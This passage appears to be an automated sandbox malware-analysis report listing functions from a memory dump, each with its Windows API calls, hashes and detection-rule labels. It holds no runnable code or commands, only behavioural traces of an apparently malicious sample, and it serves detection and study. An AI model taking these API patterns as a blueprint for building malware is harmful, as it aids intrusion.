RtlLeaveCriticalSection.NTDLL(03048448), ref: 0302E88F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 0302E8A0
RtlAllocateHeap.NTDLL(00000000,03048464,?), ref: 0302E90B
InterlockedIncrement.KERNEL32(0304845C), ref: 0302E922

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 3a23105ee006b72ab0ffc1c926bce8aaa3cf8b676e9fd739292040443dd6d373
Instruction ID: 62de3dc3f9e79173dfd49179d96a7465008688079972cc94f9b60f2f7708ade8
Opcode Fuzzy Hash: 3a23105ee006b72ab0ffc1c926bce8aaa3cf8b676e9fd739292040443dd6d373
Instruction Fuzzy Hash: 6531D1799033169FC760EF28E84491AFBE8FB85720B084A2EF89583250D735DA21CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 030298F5 Relevance: 7.6, APIs: 5, Instructions: 83filestringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03048088), ref: 0302990B
lstrlenW.KERNEL32(00000000), ref: 0302995F
CloseHandle.KERNEL32(00000000), ref: 03029987
DeleteFileW.KERNEL32(00000000,00000000,?,?), ref: 030299B3
RtlLeaveCriticalSection.NTDLL(03048088), ref: 030299D1

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 849222082-0
Opcode ID: d765fc0b5d5c81df4b45885ec5b609e6e7eedaad6a01ed9de7c550202c278e2d
Instruction ID: 875f03f5f044fa925d917950dbd2bf63de30021de7b1d84b29b69951400a348f
Opcode Fuzzy Hash: d765fc0b5d5c81df4b45885ec5b609e6e7eedaad6a01ed9de7c550202c278e2d
Instruction Fuzzy Hash: CB2183B9502315BFDB20EF7ADD84EAEBBFCAF04610F084569E402D2115DB35DA10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0302A165 Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

DeleteFileA.KERNEL32(00000000,000004D2), ref: 0302A188
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0302A191
GetLastError.KERNEL32 ref: 0302A19B
HeapFree.KERNEL32(00000000,00000000), ref: 0302A25A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$Time$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemTempThreadlstrcpy
String ID:
API String ID: 855586217-0
Opcode ID: 11df15260f7be0a64dcb99ce6b78f2855a76fc04b99d1fc1502d2c924a5f19aa
Instruction ID: f0d15ec3c9c7799bf9b1b33d22be4bf29a4949bc97ddba5ed50f36927397bbb0
Opcode Fuzzy Hash: 11df15260f7be0a64dcb99ce6b78f2855a76fc04b99d1fc1502d2c924a5f19aa
Instruction Fuzzy Hash: C02110FB6032146BDA10F7A8ED4CECA379CEF86210B049A61F645CB154EB29A705C765

Uniqueness

Uniqueness Score: -1.00%

Function 030216B4 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?,?,030280CF,?,?,?), ref: 030216D2
GetFileSize.KERNEL32(00000000,00000000,?,?,030280CF,?,?,?), ref: 030216E2
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,030280CF,?,?,?), ref: 0302170E
GetLastError.KERNEL32(?,?,030280CF,?,?,?), ref: 03021733
CloseHandle.KERNEL32(000000FF,?,?,030280CF,?), ref: 03021744

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: eb684233f84efd68385f95f9878cd02872a6b2e87864895a18b88fc4610a584d
Instruction ID: a451877171e8864bf8371a9e459448b894ae8d2a57f26436c109694eefb552d4
Opcode Fuzzy Hash: eb684233f84efd68385f95f9878cd02872a6b2e87864895a18b88fc4610a584d
Instruction Fuzzy Hash: E411E4B6101264BFCB30AF68C8C8EAFBFBCEB85360F054665F965A7180D6309D4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 03028845 Relevance: 7.6, APIs: 5, Instructions: 71librarystringloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,06092EE2), ref: 03028873
GetProcAddress.KERNEL32(00000000), ref: 0302887A
_strupr.NTDLL ref: 030288E8
lstrlen.KERNEL32(00000000,?,00000000,?,00000103), ref: 030288F0
GetLastError.KERNEL32(?,00000000,?,00000103), ref: 03028918

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc_struprlstrlen
String ID:
API String ID: 4219666113-0
Opcode ID: 67fa1bb382cb807e715698a9b2f274f4027a8dff628b47caf76a7a86a9bd2e86
Instruction ID: 961d0fe8a3781d95f05e85ae2aaf8b3970bf7af0616037e6e930fefbe25923cd
Opcode Fuzzy Hash: 67fa1bb382cb807e715698a9b2f274f4027a8dff628b47caf76a7a86a9bd2e86
Instruction Fuzzy Hash: 1621B0BD906216EFDB54EFB8DD08BDA7BECAB08300F0485A6E941D7184EB74D7448B50

Uniqueness

Uniqueness Score: -1.00%

Function 03037150 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0303717E
GetLastError.KERNEL32 ref: 030371A1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 030371B4
GetLastError.KERNEL32 ref: 030371BF
HeapFree.KERNEL32(00000000,00000000), ref: 03037207

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 1dc781c6efbb05687db7904ca48b2b5fe9671653e8e2f6a4f5d9a9f1a8eb95ff
Instruction ID: a7eb150d23fa06828ab8de926e149f641e06f02f27e302d41a38c71859230c7c
Opcode Fuzzy Hash: 1dc781c6efbb05687db7904ca48b2b5fe9671653e8e2f6a4f5d9a9f1a8eb95ff
Instruction Fuzzy Hash: 0D219FB9502244EBEB71DF5CDE88B5EBBBDFB01B14F640558F142964A4C379AE84CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0303DE4D Relevance: 7.6, APIs: 5, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,03027FC0), ref: 0303DE78
memset.NTDLL ref: 0303DEAD
memset.NTDLL ref: 0303DEC4
memset.NTDLL ref: 0303DEDB
memset.NTDLL ref: 0303DEF2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memset$SwitchThread
String ID:
API String ID: 2665758810-0
Opcode ID: 3dcd1c61468e9b870a3f6195be1f234e7ac1cd43d9398d92e30be7aa04d237b3
Instruction ID: bb019056ab644ad42c2771e2a2f1ddf8da6c552721990dc7a565f5abacc15422
Opcode Fuzzy Hash: 3dcd1c61468e9b870a3f6195be1f234e7ac1cd43d9398d92e30be7aa04d237b3
Instruction Fuzzy Hash: 0111A3FD943B10A7C121FB19EF04D9F7EADAFD7B00B084925F404A7149D73A4B4186A5

Uniqueness

Uniqueness Score: -1.00%

Function 03023140 Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0302315D
memcpy.NTDLL(?,?,00000009), ref: 0302317F
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 03023197
lstrlenW.KERNEL32(?,00000001,?), ref: 030231B7
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 030231DC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: e633172bb120c0bda02bec9b49f2c2c7b9745cde688fc34628b591f7829f2366
Instruction ID: 6b811abe10b5325e4c39b0018dc5786b2a51f75c9c27a754e7398af1d09adc3c
Opcode Fuzzy Hash: e633172bb120c0bda02bec9b49f2c2c7b9745cde688fc34628b591f7829f2366
Instruction Fuzzy Hash: D4114F7ED02208BBDB21EBA4E849F9E7FB8AB48710F048551F945E6284D778D709CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0302EE4A Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303F85D: lstrlen.KERNEL32(?,03048368,?,00000008,030403F4,?,00000000,?,00000000,03048374,03048374,030430F0,0303C6CE,?,?,?), ref: 0303F869

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0302EE73
memcpy.NTDLL(00000000,?,?), ref: 0302EE86
RtlEnterCriticalSection.NTDLL(03048448), ref: 0302EE97
RtlLeaveCriticalSection.NTDLL(03048448), ref: 0302EEAC
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0302EEE4

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 627ec747cbaf00fb70787abc753573584ed1a85957848850392d12d29ed08308
Instruction ID: bfe5d38750d2cefb0c751d92e6cbd9f1bb7a6898ed44aebfc02739d4f66da302
Opcode Fuzzy Hash: 627ec747cbaf00fb70787abc753573584ed1a85957848850392d12d29ed08308
Instruction Fuzzy Hash: 9F11C2BA543221AFC721BF24EC44E6BBBACEB86621705497AF91593214C73A5D10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0302EFCF Relevance: 7.6, APIs: 5, Instructions: 57memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0302EFF0
wsprintfA.USER32 ref: 0302F00C
RegCreateKeyA.ADVAPI32(80000001,03048440,00000000), ref: 0302F024
RegCloseKey.ADVAPI32(?), ref: 0302F04C
HeapFree.KERNEL32(00000000,00000000), ref: 0302F05B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseCreateFreewsprintf
String ID:
API String ID: 1380539425-0
Opcode ID: 80dbca597832043bc46832b31b80083872b93fd8ec4ece43392323ad654ce5c6
Instruction ID: 88aacd609e36398e47cfc9aa25ae11443a8bdb2a73ab0006ac1ff8e8bf9c5ec5
Opcode Fuzzy Hash: 80dbca597832043bc46832b31b80083872b93fd8ec4ece43392323ad654ce5c6
Instruction Fuzzy Hash: 4A1161BA101108FFEB116B94ED88FAA3B7DFB48B14F104165FA0095164D7769F649BA0

Uniqueness

Uniqueness Score: -1.00%

Function 030340A9 Relevance: 7.5, APIs: 5, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 030340BC
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 030340CE
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 030340F8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0303410B
CloseHandle.KERNEL32(?), ref: 03034114

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID:
API String ID: 603522830-0
Opcode ID: b43fb239b112bd47fb4775a38535070f98f402cbe11a0bdba4bbb49a7b2e8d14
Instruction ID: 1dafcf92f8ef377de742b9679f002d0d698e2ec5dada420a19a9f2ab6ba0d1ce
Opcode Fuzzy Hash: b43fb239b112bd47fb4775a38535070f98f402cbe11a0bdba4bbb49a7b2e8d14
Instruction Fuzzy Hash: 420148B9902229BFCB10AF95DC0ADEEBF7CEF05660B004254E926E6199D7749611CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03040E50 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0303D1FC,?), ref: 03040E58
GetVersion.KERNEL32 ref: 03040E67
GetCurrentProcessId.KERNEL32 ref: 03040E83
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03040EA0
GetLastError.KERNEL32 ref: 03040EBF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: fe080302624e2f237590c3179c3513cf6a7a8c8d980a2e573bc261737a7e5d40
Instruction ID: c13309ebbb4d34bd168e35c29fa02c7896e35320830a73023a4767593ed35e43
Opcode Fuzzy Hash: fe080302624e2f237590c3179c3513cf6a7a8c8d980a2e573bc261737a7e5d40
Instruction Fuzzy Hash: 7EF028FC647301ABD760FB399A197157BA8B704741F148A2AE742D61E8D73A9360C714

Uniqueness

Uniqueness Score: -1.00%

Function 0302D191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,03026D0C,?,?,?), ref: 0302D1DD
GetTickCount.KERNEL32 ref: 0302D1E8
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,03026D0C,?,?,?), ref: 0302D1F4

Strings

\Low, xrefs: 0302D1BD

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$NameTempTime$CountCreateCurrentDirectorySystemThreadTicklstrcpy
String ID: \Low
API String ID: 4108106972-4112222293
Opcode ID: 44f0b229dfdc020a49cca6407f8df18f3fce2d2281b5f1416f88a1b29084a6ec
Instruction ID: 72508e3e66e21a2bf99ecacd9037b7369238496e673143246ea12402f9d8f541
Opcode Fuzzy Hash: 44f0b229dfdc020a49cca6407f8df18f3fce2d2281b5f1416f88a1b29084a6ec
Instruction Fuzzy Hash: 1A01D2B52436307BD210BB759D08F9BBBDCAF42651B058165F520D7185CB18DE0187B9

Uniqueness

Uniqueness Score: -1.00%

Function 03029EC0 Relevance: 6.4, APIs: 5, Instructions: 107stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03041702: lstrlen.KERNEL32(00000000,?,00000000,00000008,00000000,?,03029EF2,?,00000000,00000004,00000000), ref: 0304170E
Part of subcall function 03041702: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,03029EF2,?,00000000,00000004,00000000), ref: 0304176C
Part of subcall function 03041702: lstrcpy.KERNEL32(00000000,00000008), ref: 0304177C

lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 03029F0C
wsprintfA.USER32 ref: 03029F3A
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 03029F98
GetLastError.KERNEL32 ref: 03029FAF
GetLastError.KERNEL32 ref: 03029FE0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: lstrlen$ErrorLast$lstrcpymemcpywsprintf
String ID:
API String ID: 640181277-0
Opcode ID: e8874289a639caf56cbf770de36aa36657a3d2ebfb9230a8f5672141b4368c6d
Instruction ID: e1202809c29eeac1578457d4ad0f5406adbffb6b3f71426356ac28d19029fbab
Opcode Fuzzy Hash: e8874289a639caf56cbf770de36aa36657a3d2ebfb9230a8f5672141b4368c6d
Instruction Fuzzy Hash: 3A419DB540230AAFDF51EF64DE88BAABBB8FF48304F044565F90192150DB74DA60CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303C431 Relevance: 6.2, APIs: 4, Instructions: 248memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0303C465
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0303C5A4

Part of subcall function 03035701: lstrcat.KERNEL32(00000000,?), ref: 03035756
Part of subcall function 03035701: StrTrimA.SHLWAPI(00000000,03043FE8,00000000,00000000,?,?,030430F0,0303C5F4,00000000,030483CC), ref: 03035773

StrTrimA.SHLWAPI(00000000,030433F8,00000000,030483CC), ref: 0303C613

Part of subcall function 03034D3D: lstrcpy.KERNEL32(00000000,03048370), ref: 03034D69
Part of subcall function 03034D3D: lstrcat.KERNEL32(00000000,?), ref: 03034D74

Part of subcall function 03033C1F: memcpy.NTDLL(00000000,?,00000010), ref: 03033C70
Part of subcall function 03033C1F: memcpy.NTDLL(00000000,?,?,00000010), ref: 03033D03

HeapFree.KERNEL32(00000000,?,00000001,030483CC,?,?,?), ref: 0303C70F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateTrimlstrcatmemcpy$Freelstrcpy
String ID:
API String ID: 2871154424-0
Opcode ID: fd4ec86d995fa0665a98d0a338c5b434ef9f94f262c730b194b925bf80411580
Instruction ID: 4f6f9ab7b2ce77323bc64411a2d9f0c9ac9afbe0dd1d6e29a84f60da778682cd
Opcode Fuzzy Hash: fd4ec86d995fa0665a98d0a338c5b434ef9f94f262c730b194b925bf80411580
Instruction Fuzzy Hash: AD91DFFA102301AFD751EF68DD80E5AB7E8FB88700F054929F508E7260D739EA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03037E64 Relevance: 6.2, APIs: 4, Instructions: 200timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

FileTimeToLocalFileTime.KERNEL32(00000000,0303500A), ref: 03037EC6
FileTimeToSystemTime.KERNEL32(0303500A,?), ref: 03037ED4
FileTimeToLocalFileTime.KERNEL32(00000008,0303500A), ref: 03037FDD
FileTimeToSystemTime.KERNEL32(0303500A,?), ref: 03037FEB

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Time$File$LocalSystem$AllocateHeap
String ID:
API String ID: 735003003-0
Opcode ID: 0174a54f7e2cfd6037dc13d4902bf250d9af994e6f0a231aee80b6c735186fd2
Instruction ID: a4754489c17ebf04833b36540c9c4011f92215c95fd5f61a22b63131005761f3
Opcode Fuzzy Hash: 0174a54f7e2cfd6037dc13d4902bf250d9af994e6f0a231aee80b6c735186fd2
Instruction Fuzzy Hash: 87713DB590121AAFCB50DFA8C984AEEB7FCBB49704F04456AF515E7240E738DA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03034B3A Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 03022C75: RegOpenKeyA.ADVAPI32(80000002,03044018,?), ref: 03022C90
Part of subcall function 03022C75: LoadLibraryA.KERNEL32(00000000), ref: 03022CDE
Part of subcall function 03022C75: GetProcAddress.KERNEL32(00000000,?), ref: 03022CF7
Part of subcall function 03022C75: RegCloseKey.ADVAPI32(?), ref: 03022D48

GetLastError.KERNEL32 ref: 03034CC8
FreeLibrary.KERNEL32(?), ref: 03034D30

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 2570a82af1f4b22d8dfbb28c189f85196171d538bf2252ba4d442acf1af90c3c
Instruction ID: 40b4f8ae14f40f9130f0c064a6ff279677247dece60758fc5eaa4d6f9d88d15c
Opcode Fuzzy Hash: 2570a82af1f4b22d8dfbb28c189f85196171d538bf2252ba4d442acf1af90c3c
Instruction Fuzzy Hash: 237116B5E0120AEFCF40DFE5C9849AEBBB9FF49305B1489A9E515AB250C731AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03041B5C Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000030,?,?,?,03029F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 03041B68

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

ResetEvent.KERNEL32(?,?,?,?,03029F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 03041BDF
GetLastError.KERNEL32(?,?,?,03029F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 03041C0C

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

GetLastError.KERNEL32(?,?,?,03029F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 03041CCE

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 407a9ca9451f3f16d9b8b7167f87d4253a2fd8c8491602a1d29dd224e7a73958
Instruction ID: 165af37cf46ee4d742471e0c9a8b705a2534c98c2bc64183a7d1a986763c1121
Opcode Fuzzy Hash: 407a9ca9451f3f16d9b8b7167f87d4253a2fd8c8491602a1d29dd224e7a73958
Instruction Fuzzy Hash: 104190F5602208BFDB209FA1DD89EAB7BEDEB05640B044A39F652D2190E770DE448B60

Uniqueness

Uniqueness Score: -1.00%

Function 0302AAD5 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023), ref: 0302AAEF
StrChrA.SHLWAPI(?,0000005C), ref: 0302AB16
lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 0302AB3C
lstrcpy.KERNEL32(?,?), ref: 0302ABE0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: lstrcpylstrcpyn
String ID:
API String ID: 4154805583-0
Opcode ID: 9113a1983ca609548a8b61e3c52f327f8f41c2008f801493fd8b27acd1c77d39
Instruction ID: bed6e3bb5bc63ad8e2a8e533eb122dbde073eece4c2eecd4f8395daf5984f187
Opcode Fuzzy Hash: 9113a1983ca609548a8b61e3c52f327f8f41c2008f801493fd8b27acd1c77d39
Instruction Fuzzy Hash: 3F4181B6901119BFDB12EBA4CD44DEEBFFDAB08210F1885A6F515E7141DB349B44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03021F46 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 03021F8D
_strupr.NTDLL ref: 03021FE2
_strupr.NTDLL ref: 03022021
_strupr.NTDLL ref: 0302205B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 73d54b3101859485a7494330f0caf59a382e8d6cb9d6d86b90674d204747b000
Instruction ID: fa4d08dc72d1b58d5b59974a29c969a670e948b90fecc26aa5462687dfee00ff
Opcode Fuzzy Hash: 73d54b3101859485a7494330f0caf59a382e8d6cb9d6d86b90674d204747b000
Instruction Fuzzy Hash: 744166B180221AAEDB64EFA4D884AEEFBFDFF44340F144921E834DA165D778E545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03032197 Relevance: 6.1, APIs: 4, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,03029F5A), ref: 030321AD
lstrlen.KERNEL32(?), ref: 030321E4

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

memcpy.NTDLL(00000000,?,?), ref: 03032266
memcpy.NTDLL(00000008,030433F8,00000002,00000000,?,?), ref: 0303227B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 4125730466-0
Opcode ID: b1da64b41bd662bd1f00e8ef326548a7134345c943138be879a993fd3bc5348f
Instruction ID: fd64cad2e49ba256583a9196f836c6fc2d3feb2ad3322bcd74279fa22ceffc12
Opcode Fuzzy Hash: b1da64b41bd662bd1f00e8ef326548a7134345c943138be879a993fd3bc5348f
Instruction Fuzzy Hash: 1A4141B590120AAFDB04EF98DD84EAEB7FCEF49304B144565E919D7211EB30EB11CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303F714 Relevance: 6.1, APIs: 4, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03043060), ref: 0303F7BF
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0303F7D2
lstrcpy.KERNEL32(00000004,03043060), ref: 0303F7F0
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0303F814

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrlen
String ID:
API String ID: 1437807458-0
Opcode ID: 0f33a69868ad18827528079ac854d55aa513925e9005a1386f92b17df200505c
Instruction ID: ae314b0798c74ece275fef9948151c7620b362982ceb20edd26b9453716c6833
Opcode Fuzzy Hash: 0f33a69868ad18827528079ac854d55aa513925e9005a1386f92b17df200505c
Instruction Fuzzy Hash: 1A317EB9D02216EFDB51EFA8DD44A9EBBFCEF46700F14846AE50897210D7749A508B90

Uniqueness

Uniqueness Score: -1.00%

